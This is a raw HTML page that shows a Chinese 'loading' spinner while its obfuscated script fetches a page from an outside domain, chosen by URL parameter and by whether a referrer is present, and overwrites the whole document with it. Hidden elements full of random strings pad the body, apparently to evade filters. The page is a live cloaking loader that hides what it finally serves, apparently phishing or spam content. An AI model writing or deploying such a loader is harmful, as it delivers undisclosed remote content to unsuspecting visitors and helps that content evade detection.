<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Wp5H3pFLI {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Wp5H3pFLI .y7eYmg4u {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Wp5H3pFLI .content {
            line-height: 50px;
            text-align: center
        }

        .Wp5H3pFLI .img {
            width: 100%
        }

        .Wp5H3pFLI .uUolAd8ntb {
            text-align: center
        }

        .Wp5H3pFLI .uUolAd8ntb span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Wp5H3pFLI .uUolAd8ntb span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Wp5H3pFLI .uUolAd8ntb span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Wp5H3pFLI .uUolAd8ntb span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Wp5H3pFLI .uUolAd8ntb span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Wp5H3pFLI .uUolAd8ntb span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Wp5H3pFLI .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function UMY690Olz(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var qSLFli = UMY690Olz('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ qSLFli +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ qSLFli +".html?a=share";
		}
		
        iTEsMwK7b6=url+"#"+new Date().getTime();
        iTEsMwK7b6 && function() {
            $.get(iTEsMwK7b6, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >hiITNf5OQZwYONP</b>
<b style='display:none' >hiITNf5OQZwYONP</b>
<a  href='#' style='display:none'>UAVTeiqTkd23bBkqgDBhcStD89KmOm8iyM0WpXR06tZNtp7VZT4dECFsEobKT8ad5tc9wTxyiQ0mCPANv2gJE2kRm1dAWC3L</a>
<div style='display:none'>Qh1CI5wNI3jeNbydr7k19tV0uTT0lYp</div>
<div style='display:none'>Qh1CI5wNI3jeNbydr7k19tV0uTT0lYp</div>
<b style='display:none' >hiITNf5OQZwYONP</b>
<span style='display:none'>vH3BqhklzLLvxHSELB7vAvzFDw4KEsBsBqmj2SUloUMSY85gAk1zdZvc8l</span><div class="Wp5H3pFLI">
    <div class="y7eYmg4u">
        <div class="uUolAd8ntb">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>SyvLvVx6Tnl02Oeyiic67j28Lp1M92A9KyOMcy6AIo4ipglOW</a>
<div style='display:none'>i0GUSMjdPYlknPET3fdDfvezBM4Wsl5SAuXaIVNVXaMEcDrXaLl43p8eqnyWXoA4DpPLbOiVUKkAVIJDdaB</div>
<h1 style='display:none' >LMxjlEmWCMCYBSqOXszdzLbE8B6PDA0Q539vWdUq1KjZYGH3y8lOnHX4LH7lat1k6pZQiH9szj0JR</h1>
<h1 style='display:none' >LMxjlEmWCMCYBSqOXszdzLbE8B6PDA0Q539vWdUq1KjZYGH3y8lOnHX4LH7lat1k6pZQiH9szj0JR</h1>
<ul style='display:none' >bmBo9WLrgfYmG</ul></body>
</html>